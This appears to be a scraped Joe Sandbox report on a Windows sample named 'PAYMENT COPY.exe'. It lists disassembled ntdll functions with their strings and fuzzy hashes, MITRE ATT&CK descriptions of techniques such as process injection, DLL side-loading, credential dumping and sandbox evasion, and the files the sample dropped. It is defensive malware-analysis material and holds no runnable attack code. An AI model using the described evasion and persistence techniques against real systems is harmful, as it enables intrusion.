Function 048F7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 04934713
CLIENT(ntdll): Processing section info %ws..., xrefs: 04934787
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04934655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049346FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04934742
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04934725
ExecuteOptions, xrefs: 049346A0

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: a80f487e45f6ae1a24f51987d6053b35fc6136445317e990823656af909556c5
Instruction ID: 3dc310ee30a70b9d9e94972eec3cbdbb0fe45f5ec1587f6d6e6472560855999c
Opcode Fuzzy Hash: a80f487e45f6ae1a24f51987d6053b35fc6136445317e990823656af909556c5
Instruction Fuzzy Hash: CF51F7316002197AFB10ABA4DC89FA977A8EF49309F140AA9E605E71D0E774BE45CF51

Function 04996940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 8c449c35d338981e30bb76807df2dc38886e5d34a6d9daa546c82e11817db349
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 42021271508341AFDB45CF5CC894A6ABBE9EFC8704F04892DB9998B264DB31ED05CB42

Function 0490B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0490B6BF

Strings

0, xrefs: 0490B695
0, xrefs: 0490B66F
+, xrefs: 0490B65A
-, xrefs: 0490B650

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 9a6568423b052a0f844721c30d65c850a3bedbd887da5a480bfa758f4b084b73
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: BC81A270E452499EDF288EE8C8517FEBBBAAF85720F18C579D861A76D0D734B840CB50

Function 049720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0497214F
___swprintf_l.LIBCMT ref: 04972172

Strings

]:%u, xrefs: 04972169
[, xrefs: 0497212B
%%%u, xrefs: 04972146

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 8cee331a051d75f9ad680443bcd160d0e592325e4eed8b3a21ec3a056d0e49f9
Instruction ID: 814884492f6db3ace70c3bc707b7e1c3f550bfc35ba2120c3479d3013ed4cdab
Opcode Fuzzy Hash: 8cee331a051d75f9ad680443bcd160d0e592325e4eed8b3a21ec3a056d0e49f9
Instruction Fuzzy Hash: 32215176A10159AFDB10DFA9C840EEEBBFCEF44684F044176ED45E3240E730AA018BA1

Function 048EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0493031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049302BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049302E7

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 6bee894c128cd8853192fea485bd1057d30123b2db5b43581bbf902a9251d4fa
Instruction ID: 1656bcbf68186c102a3e1f9854e4848ff3753a8b08684195ff21a0ed502f1fc8
Opcode Fuzzy Hash: 6bee894c128cd8853192fea485bd1057d30123b2db5b43581bbf902a9251d4fa
Instruction Fuzzy Hash: 47E1A030604741EFD725CF29C884B2AB7E5BB8A318F144A69E695CB2E1E774F845CB42

Function 048FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04937B7F
RTL: Re-Waiting, xrefs: 04937BAC
RTL: Resource at %p, xrefs: 04937B8E

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 81b31e2e0ef9d6f0bded52af7982ba5ed7be79460c7008b785114c8fd6a00afc
Instruction ID: e3c84f2a221a7198a3bf0a43f7a995c7219784b4dcfc5397bcd34ccc59ccf467
Opcode Fuzzy Hash: 81b31e2e0ef9d6f0bded52af7982ba5ed7be79460c7008b785114c8fd6a00afc
Instruction Fuzzy Hash: DD41E1357007029FE720DE29CC40B6AB7E5EF89725F100A6DE95ADB680EB70F8058B91

Function 048FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0493728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04937294
RTL: Re-Waiting, xrefs: 049372C1
RTL: Resource at %p, xrefs: 049372A3

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 9b8eafa3e99970ef5aae3ea263beacf92783ebe3e7f843b19fa96812051a41b3
Instruction ID: b1741b0b61d117c990efada78e587e52dc05d19e6e378c52046820079228ee91
Opcode Fuzzy Hash: 9b8eafa3e99970ef5aae3ea263beacf92783ebe3e7f843b19fa96812051a41b3
Instruction Fuzzy Hash: 9A410271700206AFE720DE64CC41F66B7A5FB95719F104A29FA55EB680EB20F852CBD0

Function 04972300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0497238D
___swprintf_l.LIBCMT ref: 049723B3

Strings

%%%u, xrefs: 04972384
]:%u, xrefs: 049723AA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 1250380ec41bf8ce3b1c05e546ceab756e32892a2e368ba5c79e8dbceb46003c
Instruction ID: eaa782a8dbc26a7ef4c8a9f63a2abb0f26e8415abacff964c1ef0b3b258d5589
Opcode Fuzzy Hash: 1250380ec41bf8ce3b1c05e546ceab756e32892a2e368ba5c79e8dbceb46003c
Instruction Fuzzy Hash: BA316672A102199FDB20DF29DC40BEE77BCEB44B14F4445A5E849E7240EB30BA449FA1

Function 04907D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04907E8B

Strings

-, xrefs: 04907DDD
+, xrefs: 04907DE8

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: c2c8d8a8ecfd13a9f8271cca71dda01a9d97578a38d07e0734ccdafcff44f253
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 2E918470F402169FDB24DEA9C8846BEB7B9AF44730F14C9BAE955E72D0E730B9418760

Function 048C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 048C9175
$, xrefs: 048C9191

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 666217be9411eda471776f45f8b55731cf446988db12cafb33d214e3e53a0d48
Instruction ID: 9c09dcf7cc5854543e4b053bdfd99163c7ba007b0f8bcab6f4772cab7ca0f64f
Opcode Fuzzy Hash: 666217be9411eda471776f45f8b55731cf446988db12cafb33d214e3e53a0d48
Instruction Fuzzy Hash: 91812072D002699BDB31CF54CD45BD9B7B8AB44714F0045EAE919F7240D774AE84CFA1

Function 0494CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0494CFBD

Strings

@, xrefs: 0494CF0A
@4Dw@4Dw, xrefs: 0494CFD5, 0494CFDA, 0494CFF1

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Dw@4Dw
API String ID: 4062629308-3936743583
Opcode ID: 7108fa33f0ef3992426d9df28c020b653f6a59079ffa788c85b403651f0ebb22
Instruction ID: 937837622627f4e22875e69a76a4a610ac365745304126521d6c6f828848aef2
Opcode Fuzzy Hash: 7108fa33f0ef3992426d9df28c020b653f6a59079ffa788c85b403651f0ebb22
Instruction Fuzzy Hash: CB418B75A01218DFDB21DFA9D940EAEBBF8EF84B04F00467AE905DB250D774E801CBA5

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PAYMENT COPY.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\4jm-6-hL7

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5mebfolc.liw.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uzprlt2.ptq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqhej52h.2qy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfot3gfl.h2a.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtxbro3o.ale.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yl53tnli.vg4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z55jwqv5.y2t.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztmcufib.3lt.ps1

C:\Users\user\AppData\Local\Temp\tmp1D60.tmp

C:\Users\user\AppData\Local\Temp\tmp525.tmp

Windows Analysis Report
PAYMENT COPY.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre